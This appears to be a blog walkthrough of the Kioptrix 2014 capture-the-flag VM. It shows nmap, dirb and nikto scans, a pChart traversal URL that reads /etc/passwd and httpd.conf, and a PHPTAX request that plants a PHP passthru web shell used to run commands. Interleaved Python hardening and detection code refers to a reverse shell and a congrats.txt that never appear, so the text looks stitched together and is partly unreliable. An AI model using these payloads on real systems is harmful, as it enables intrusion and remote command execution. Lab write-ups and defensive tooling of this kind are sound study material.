Tuesday, 16 August 2016

Kioptrix 2014

This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of the VM Kioptrix 2014 from Vulnhub, a site dedicated to penetration testing Capture The Flag challenges.


Scenario:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.137
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.137
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.137
dirb http://192.168.180.137
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.137/FUZZ
smbclient -N -L 192.168.180.137
enum4linux -a 192.168.180.137
nikto -h 192.168.180.137

 Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                             
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.              
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.              
 192.168.180.137 00:0c:29:6c:0a:ef      1      60  VMware, Inc.              
 192.168.180.254 00:50:56:ea:51:b8      1      60  VMware, Inc.    

nmap -sV -T4 -O -F --version-light 192.168.180.137

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-13 01:53 EDT
Nmap scan report for 192.168.180.137
Host is up (0.00021s latency).
Not shown: 97 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:6C:0A:EF (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.77 seconds

dirb http://192.168.180.137

-----------------
DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Wed Jul 13 02:11:19 2016
URL_BASE: http://192.168.180.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                        

---- Scanning URL: http://192.168.180.137/ ----
+ http://192.168.180.137/cgi-bin/ (CODE:403|SIZE:210)                          
+ http://192.168.180.137/index.html (CODE:200|SIZE:152)                      
                                                                             
-----------------
END_TIME: Wed Jul 13 02:11:43 2016
DOWNLOADED: 4612 - FOUND: 2

 wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.137/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.180.137/FUZZ
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request  
==================================================================

00527:  C=403      8 L      22 W    210 Ch  "cgi-bin/"
..."
03027:  C=404      7 L      24 W    206 Ch  "champion"..."
Fatal exception: Pycurl error 7: Failed to connect to 192.168.180.137 port 80: Connection timed out

None


nikto -h 192.168.180.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.137
+ Target Hostname:    192.168.180.137
+ Target Port:        80
+ Start Time:         2016-07-13 02:17:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2016-07-13 02:18:53 (GMT-4) (67 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Source of index:
<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

nikto -h 192.168.180.137:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.137
+ Target Hostname:    192.168.180.137
+ Target Port:        8080
+ Start Time:         2016-07-13 02:31:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Here I really got annoyed because it seems the scan gets filtered. So I decided to switch the browser user agent string:
Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0

Try 2:
 wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.137/FUZZ -H "Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0"

Also here, in nikto's configuration file:
etc/nikto.conf

No luck. Let us go down another path:
https://www.exploit-db.com/exploits/31173/


http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin


http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/ssh/ssh_host_rsa_key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6FPh3YLGl3HJ64W5kcTmsHc4sAI7CMVlnLLoo71P/UYM12o8GWEqMkWWLdlyzN7w/Z2PfHnNw8D9lkSjqoKLpyi0nFLSX9NfKCcm2fec0N0/741kRrnmAv0xe6N939PjMPTilagFzmakkm2JE12D8X+29lcj1bDSzEAZalCC/gEOYIhJlZJhTVCGQEBT5Te4/H/jbFAEIvYYsg/rHJ9ssV4IU1ZY+TDf8CI+g/TcjQR9qJI+cyYJFTlKezjYZEkljOcrNXpqMrRB+taiJQBDx8OxRj1mFUO8gHd+NOgYYmicjOx6BODAP6Mvf7QR9ULNDK34oPAgpVvP56UNZaeOL root@testing
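The Script parameter in the requests above is handed to a file read without being confined to the examples directory, which is all the traversal needs. The Python below is an example added here, not pChart's code: it shows the vulnerable join next to a hardened resolver that decodes the parameter, normalises it and then requires the result to stay under an allow-listed base directory with an allow-listed extension. The base path /app/examples and the .php allow-list are assumptions made for the illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed base directory standing in for the viewer's "examples" folder
# (an assumption for this example, not pChart's real layout).
SCRIPT_BASE = "/app/examples"


def resolve_script_unsafe(base, script_param):
    """The vulnerable pattern: decode the parameter and glue it onto the base.
    '..' segments are honoured, so the result may land anywhere on disk."""
    return posixpath.normpath(base + "/" + unquote(script_param))


def resolve_script_safe(base, script_param, allowed_ext=".php"):
    """Hardened resolver: decode, reject absolute paths and NUL bytes,
    normalise, then require the result to stay inside `base` and to carry
    an allow-listed extension. Returns None when any check fails."""
    decoded = unquote(script_param)
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    # `candidate` must be strictly below `base`; comparing against the base
    # plus a trailing slash stops "/app/examples2" passing as inside it.
    if not candidate.startswith(base + "/"):
        return None
    if not candidate.endswith(allowed_ext):
        return None
    return candidate


def demo():
    """Run the traversal string from the request above through both resolvers."""
    payload = "%2f..%2f..%2fetc/passwd"   # the Script= value used on this page
    return (resolve_script_unsafe(SCRIPT_BASE, payload),
            resolve_script_safe(SCRIPT_BASE, payload),
            resolve_script_safe(SCRIPT_BASE, "index.php"))


if __name__ == "__main__":
    print(demo())
```

The unsafe resolver returns /etc/passwd for the payload; the safe one returns None for it and for any other escape attempt, while a plain index.php still resolves. Decoding is done once on purpose: a doubly encoded payload stays literal after one decode and is rejected by the extension check.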

<html><title>PHPTAX by William L. Berggren 2003(c)</title>
<body bgcolor='777777' link='000000' vlink='000000' alink='000000'>
<table cellpadding='2' cellspacing='0' border='1' width='780' bgcolor='#999900'>

Let's have a peek in the apache conf file:
https://www.freebsd.org/doc/handbook/network-apache.html
In FreeBSD, the main Apache HTTP Server configuration file is installed as /usr/local/etc/apache2x/httpd.conf, where x represents the version number.

http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf

<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>
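The nikto runs above flagged TRACE enabled (OSVDB-877), inode numbers leaking through ETags, a Server header that spells out every component version, and missing X-Frame-Options / X-Content-Type-Options headers; the httpd.conf extract adds a directory whose access is decided by a client-supplied User-Agent header. The Python below is an example added here, not part of the original post: a small audit of an httpd.conf text for exactly these points, run over a constructed copy of the weak configuration and over a hardened counterpart. The hardened directive values, including the 192.168.180.0/24 source allow-list, are assumptions for illustration; the Header directives need mod_headers loaded.

```python
import re

# Constructed copy of the weak settings seen in the httpd.conf extract above.
WEAK_CONF = """\
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
</VirtualHost>

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>
"""

# Hardened counterpart (assumed values; the allow-list network is made up).
HARDENED_CONF = """\
ServerTokens Prod
ServerSignature Off
TraceEnable off
FileETag MTime Size
Header always set X-Frame-Options "SAMEORIGIN"
Header always set X-Content-Type-Options "nosniff"

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
</VirtualHost>

<Directory "/usr/local/www/apache22/data2">
    Options FollowSymLinks
    AllowOverride None
    Order deny,allow
    Deny from all
    # source-address allow-list instead of a header the client controls
    Allow from 192.168.180.0/24
</Directory>
"""


def _directive(conf, name):
    """Argument string of the first top-level occurrence of `name`, or None."""
    m = re.search(r"(?im)^\s*" + re.escape(name) + r"\s+(.+?)\s*$", conf)
    return m.group(1) if m else None


def audit_httpd_conf(conf):
    """Return a list of findings for the weak points nikto reported above."""
    findings = []
    v = _directive(conf, "TraceEnable")
    if v is None or v.lower() != "off":
        findings.append("TRACE: TraceEnable is not off (nikto OSVDB-877, XST)")
    v = _directive(conf, "FileETag")
    if v is None or "inode" in v.lower():   # Apache 2.2 default includes INode
        findings.append("ETAG: FileETag includes INode (leaks inode numbers)")
    v = _directive(conf, "ServerTokens")
    if v is None or v.lower() != "prod":
        findings.append("BANNER: ServerTokens is not Prod (full versions in Server header)")
    for hdr in ("X-Frame-Options", "X-Content-Type-Options"):
        if not re.search(r"(?im)^\s*Header\s+.*\b" + re.escape(hdr) + r"\b", conf):
            findings.append("HEADER: %s is not set" % hdr)
    if (re.search(r"(?im)^\s*Allow\s+from\s+env=", conf)
            and re.search(r"(?im)^\s*SetEnvIf\s+User-Agent\b", conf)):
        findings.append("ACL: access granted on a User-Agent-derived variable; "
                        "the header is client-controlled")
    if re.search(r"(?im)^\s*Options\b.*(?<!-)\bIndexes\b", conf):
        findings.append("INDEXES: directory listing enabled")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_httpd_conf(conf))
```

The weak copy produces seven findings and the hardened copy none. The point of the ACL check is the one the walkthrough itself demonstrates: a User-Agent gate keeps scanners out only until someone reads the configuration, so it is a speed bump, not access control.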

I have found instructions to change the user agent here: http://www.brighthub.com/internet/google/articles/90768.aspx

HOWTO: Change User Agent in Firefox/Iceweasel
Open the internal browser page about:config
Acknowledge the warranty warning (“I’ll be careful…”)
Right-click → “New” → “String”
A dialog box opens that asks for the name of the new string. Give it the name general.useragent.override .
Set its value to the user agent string you wish to be sent, e.g. Mozilla/5.0 to hide the Firefox version, the operating system you’re using and the language of your browser.

This exploit did not work, so let us try manually:
https://www.exploit-db.com/exploits/25849/

http://192.168.180.137:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru%28%24_GET[cmd]%29%3B%3F%3E


http://192.168.180.137:8080/phptax/data/rce.php?cmd=id
uid=80(www) gid=80(www) groups=80(www)
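Every request in this part of the walkthrough (the pChart traversal, the phptax write that stores a PHP open tag in its data directory, and the rce.php?cmd= calls that follow) goes through Apache's access log, which is exactly what the box's author asks you to revisit at the end. The Python below is an example added here and not from the original post: it parses combined-format log lines and flags traversal sequences, PHP open tags and a cmd= query parameter. The four sample lines are constructed after the requests shown in this write-up (timestamps and sizes are made up), and the cmd= rule is a heuristic tied to the shell's shape on this box that would need tuning for real traffic.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample in Apache "combined" format, shaped after this write-up.
SAMPLE_LOG = [
    '192.168.180.132 - - [13/Jul/2016:02:11:19 -0400] "GET /index.html HTTP/1.1" 200 152 "-" "Mozilla/5.0"',
    '192.168.180.132 - - [13/Jul/2016:02:40:01 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1713 "-" "Mozilla/5.0"',
    '192.168.180.132 - - [13/Jul/2016:03:02:10 -0400] "GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru%28%24_GET[cmd]%29%3B%3F%3E HTTP/1.1" 200 2210 "-" "Mozilla/4.0"',
    '192.168.180.132 - - [13/Jul/2016:03:02:45 -0400] "GET /phptax/data/rce.php?cmd=id HTTP/1.1" 200 38 "-" "Mozilla/4.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def full_decode(s, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are seen too."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def classify(target):
    """Return the rule names that fire on one request target (path?query)."""
    rules = []
    parts = urlsplit(target)
    decoded = full_decode(parts.path + "?" + parts.query)
    if "../" in decoded or "..\\" in decoded:
        rules.append("TRAVERSAL")          # pChart-style directory traversal
    if "<?php" in decoded.lower() or "<?=" in decoded:
        rules.append("PHP_TAG")            # PHP source arriving in a parameter
    params = parse_qs(parts.query, keep_blank_values=True)
    if "cmd" in params:
        rules.append("CMD_PARAM")          # heuristic: rce.php?cmd= on this box
    return rules


def scan_access_log(lines):
    """(ip, target, rules) for every line on which at least one rule fires."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify(m.group("target"))
        if rules:
            findings.append((m.group("ip"), m.group("target"), rules))
    return findings


def hits_per_source(findings):
    """Count of flagged requests per client address."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for ip, target, rules in found:
        print(ip, rules, target)
    print(hits_per_source(found))
```

Three of the four constructed lines are flagged, all from the same source, which is the "noise" the congrats.txt at the end of this page talks about. Decoding the target more than once matters: a traversal sent as %252e%252e%252f would otherwise slip past a single-decode check.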

Output of ifconfig:
em0: flags=8843 metric 0 mtu 1500
    options=9b
    ether 00:0c:29:6c:0a:ef
    inet 192.168.180.137 netmask 0xffffff00 broadcast 192.168.180.255
    nd6 options=29
    media: Ethernet autoselect (1000baseT )
    status: active
plip0: flags=8810 metric 0 mtu 1500
    nd6 options=29
lo0: flags=8049 metric 0 mtu 16384
    options=3
    inet6 ::1 prefixlen 128
    inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
    inet 127.0.0.1 netmask 0xff000000
    nd6 options=21
ipfw0: flags=8801 metric 0 mtu 65536
    nd6 options=21

http://192.168.180.137:8080/phptax/data/rce.php?cmd=cat%20/etc/ipfw.rules

#!/bin/sh
ipfw -q -f flush
cmd="ipfw -a add"
pif="em0"
# Hopefully DNS and DHCP stuff won't be blocked
$cmd 0001 allow tcp from any to me 53 out via $pif setup keep-state
$cmd 0002 allow udp from any to me 53 out via $pif keep-state
$cmd 0003 allow log udp from any to me 67 out via $pif keep-state
$cmd 0004 allow log udp from any to me 68 out via $pif keep-state
$cmd 0010 allow all from any to any via lo0
$cmd 0020 allow tcp from any to any 80 out via $pif setup keep-state
$cmd 0030 allow tcp from any to any 443 out via $pif setup keep-state
$cmd 0040 allow tcp from any to any out setup keep-state
# Deny ICMP requests
$cmd 0100 deny icmp from any to any via $pif
# Allow SSH and HTTP requests
$cmd 0200 allow tcp from any to me 22 in via $pif setup limit src-addr 2
$cmd 0201 allow tcp from any to me 80 in via $pif setup limit src-addr 2
$cmd 0201 allow tcp from any to me 8080 in via $pif setup limit src-addr 2
# Attempt to stop OS finger printing
ipfw add 780 deny log tcp from any to any 0 in via en0 setup keep-state
ipfw add 781 deny log udp from any to any 0 in via en0 keep-state
# Deny everything else and log
$cmd 0999 deny log all from any to any
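The ruleset above also decides what the compromised www user can reach from the box: rule 0040 allows any outbound TCP connection to any host, which is consistent with the reverse shell to port 443 further down getting out, rule 0201 is assigned twice, and rules 780/781 name an interface en0 that the ifconfig output does not show (the NIC is em0), so they never match. The Python below is an example added here, not part of the original post: it expands the script's $cmd/$pif variables, parses the add lines, and reports broad egress rules, duplicated rule numbers and interfaces that are not on the host. The ruleset text is the one read from the target above; the set of known interfaces is taken from the ifconfig output on this page.

```python
import re

# The ipfw ruleset read from the target (reproduced from this write-up).
IPFW_RULES = """\
#!/bin/sh
ipfw -q -f flush
cmd="ipfw -a add"
pif="em0"
# Hopefully DNS and DHCP stuff won't be blocked
$cmd 0001 allow tcp from any to me 53 out via $pif setup keep-state
$cmd 0002 allow udp from any to me 53 out via $pif keep-state
$cmd 0003 allow log udp from any to me 67 out via $pif keep-state
$cmd 0004 allow log udp from any to me 68 out via $pif keep-state
$cmd 0010 allow all from any to any via lo0
$cmd 0020 allow tcp from any to any 80 out via $pif setup keep-state
$cmd 0030 allow tcp from any to any 443 out via $pif setup keep-state
$cmd 0040 allow tcp from any to any out setup keep-state
# Deny ICMP requests
$cmd 0100 deny icmp from any to any via $pif
# Allow SSH and HTTP requests
$cmd 0200 allow tcp from any to me 22 in via $pif setup limit src-addr 2
$cmd 0201 allow tcp from any to me 80 in via $pif setup limit src-addr 2
$cmd 0201 allow tcp from any to me 8080 in via $pif setup limit src-addr 2
# Attempt to stop OS finger printing
ipfw add 780 deny log tcp from any to any 0 in via en0 setup keep-state
ipfw add 781 deny log udp from any to any 0 in via en0 keep-state
# Deny everything else and log
$cmd 0999 deny log all from any to any
"""

# Interfaces present on the box according to the ifconfig output above.
KNOWN_IFACES = {"em0", "plip0", "lo0", "ipfw0"}

RULE_RE = re.compile(
    r"^ipfw(?:\s+-\S+)*\s+add\s+(?P<num>\d+)\s+(?P<action>allow|deny)(?:\s+log)?"
    r"\s+(?P<proto>\S+)\s+from\s+(?P<src>\S+)\s+to\s+(?P<dst>\S+)"
    r"(?:\s+(?P<port>\d+))?(?P<rest>.*)$")
ASSIGN_RE = re.compile(r'^(\w+)="?([^"]*)"?$')


def parse_ipfw_script(script):
    """Expand the script's shell variables and parse each 'ipfw add' line."""
    variables, rules = {}, []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = ASSIGN_RE.match(line)
        if m:                               # cmd="..." / pif="..."
            variables[m.group(1)] = m.group(2)
            continue
        for name, value in variables.items():
            line = line.replace("$" + name, value)
        m = RULE_RE.match(line)
        if not m:                           # e.g. the initial "ipfw -q -f flush"
            continue
        rest = m.group("rest").split()
        rules.append({
            "num": int(m.group("num")),
            "action": m.group("action"),
            "proto": m.group("proto"),
            "src": m.group("src"),
            "dst": m.group("dst"),
            "port": int(m.group("port")) if m.group("port") else None,
            "direction": next((t for t in rest if t in ("in", "out")), None),
            "iface": rest[rest.index("via") + 1] if "via" in rest else None,
        })
    return rules


def broad_egress(rules):
    """Outbound allow rules with neither a destination host nor a port."""
    return [r for r in rules if r["action"] == "allow" and r["direction"] == "out"
            and r["dst"] == "any" and r["port"] is None]


def duplicate_numbers(rules):
    """Rule numbers used more than once (ipfw keeps both, in insertion order)."""
    seen, dups = set(), set()
    for r in rules:
        if r["num"] in seen:
            dups.add(r["num"])
        seen.add(r["num"])
    return sorted(dups)


def unknown_interfaces(rules, known):
    """Interfaces referenced by 'via' that the host does not have."""
    return sorted({r["iface"] for r in rules if r["iface"] and r["iface"] not in known})


if __name__ == "__main__":
    parsed = parse_ipfw_script(IPFW_RULES)
    print("broad egress:", [r["num"] for r in broad_egress(parsed)])
    print("duplicate numbers:", duplicate_numbers(parsed))
    print("unknown interfaces:", unknown_interfaces(parsed, KNOWN_IFACES))
```

Run against this ruleset it reports rule 40 as the broad egress allow, 201 as the duplicated number and en0 as an interface the host does not have. Restricting rule 0040 to the destinations the server genuinely needs is the change that would have made the outbound connection visible in the ipfw log instead of silently permitted.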

nc, wget and curl did not work.
http://192.168.180.137:8080/phptax/data/rce.php?cmd=perl%20-v

http://192.168.180.137:8080/phptax/data/rce.php?cmd=ps%20aux
USER    PID  %CPU %MEM    VSZ    RSS  TT  STAT STARTED     TIME COMMAND
root     11  98.0  0.0      0     16  ??  RL    7:26AM 35:48.34 [idle]
root      0   0.0  0.0      0    160  ??  DLs   7:26AM  0:00.03 [kernel]
root      1   0.0  0.1   6280    604  ??  ILs   7:26AM  0:00.00 /sbin/init --
root      2   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [mpt_recovery0]
root      3   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [fdc0]
root      4   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [sctp_iterator]
root      5   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [xpt_thrd]
root      6   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [pagedaemon]
root      7   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [vmdaemon]
root      8   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [pagezero]
root      9   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [bufdaemon]
root     10   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [audit]
root     12   0.0  0.0      0    224  ??  WL    7:26AM  0:01.58 [intr]
root     13   0.0  0.0      0     48  ??  DL    7:26AM  0:00.39 [geom]
root     14   0.0  0.0      0     16  ??  DL    7:26AM  0:00.05 [yarrow]
root     15   0.0  0.0      0     16  ??  DL    7:26AM  0:00.06 [syncer]
root     16   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [vnlru]
root     17   0.0  0.0      0     16  ??  DL    7:26AM  0:00.01 [softdepflush]
root    105   0.0  0.1  10060   1212  ??  Is    7:26AM  0:00.00 adjkerntz -i
root    559   0.0  0.2  10052   1576  ??  Is    7:26AM  0:00.00 dhclient: em0 [
_dhcp   625   0.0  0.2  10052   1712  ??  Is    7:26AM  0:00.00 dhclient: em0 (
root    641   0.0  0.3  10372   3488  ??  Is    7:26AM  0:00.00 /sbin/devd
root    833   0.0  0.2  12184   1628  ??  Is    7:26AM  0:00.00 /usr/sbin/syslo
root    977   0.0  0.2  10056   1560  ??  I     7:26AM  0:00.00 /usr/local/osse
ossec   981   0.0  0.3  10052   3404  ??  S     7:26AM  0:00.59 /usr/local/osse
root    985   0.0  0.2  10052   1628  ??  S     7:26AM  0:00.02 /usr/local/osse
root    989   0.0  0.2  10052   2128  ??  S     7:26AM  0:00.84 /usr/local/osse
ossec   993   0.0  0.2  10052   1800  ??  S     7:26AM  0:00.00 /usr/local/osse
mysql  1098   0.0  0.2  14636   1964  ??  Is    7:26AM  0:00.00 /bin/sh /usr/lo
mysql  1178   0.0  4.6 219884  47144  ??  I     7:26AM  0:00.31 /usr/local/libe
root   1192   0.0  1.3 206796  13556  ??  Ss    7:26AM  0:00.13 /usr/local/sbin
root   1220   0.0  0.4  20384   4116  ??  Ss    7:26AM  0:00.02 sendmail: accep
smmsp  1224   0.0  0.4  20384   4128  ??  Is    7:26AM  0:00.00 sendmail: Queue
root   1230   0.0  0.2  14260   1716  ??  Ss    7:26AM  0:00.00 /usr/sbin/cron
www    1241   0.0  2.0 210892  20464  ??  S     7:26AM  0:00.09 /usr/local/sbin
www    1242   0.0  2.1 210892  21756  ??  S     7:26AM  0:00.04 /usr/local/sbin
www    1243   0.0  2.1 210892  21768  ??  S     7:26AM  0:00.03 /usr/local/sbin
www    1244   0.0  2.1 210892  21768  ??  I     7:26AM  0:00.03 /usr/local/sbin
www    1245   0.0  2.1 210892  21768  ??  I     7:26AM  0:00.04 /usr/local/sbin
root   1277   0.0  0.4  26372   3876  ??  I     7:26AM  0:00.77 /usr/local/lib/
www    1353   0.0  2.1 210892  21768  ??  S     7:28AM  0:00.12 /usr/local/sbin
www    1494   0.0  1.4 206796  14536  ??  I     7:56AM  0:00.00 /usr/local/sbin
www    1525   0.0  0.1  14328   1476  ??  R     8:03AM  0:00.00 ps aux
root   1294   0.0  7.4 111632  76688  v0- S     7:26AM  0:38.15 /usr/local/bin/
root   1337   0.0  0.1  12184   1372  v0  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1338   0.0  0.1  12184   1372  v1  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1339   0.0  0.1  12184   1372  v2  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1340   0.0  0.1  12184   1372  v3  Is+   7:26AM  0:00.00 /usr/libexec/ge
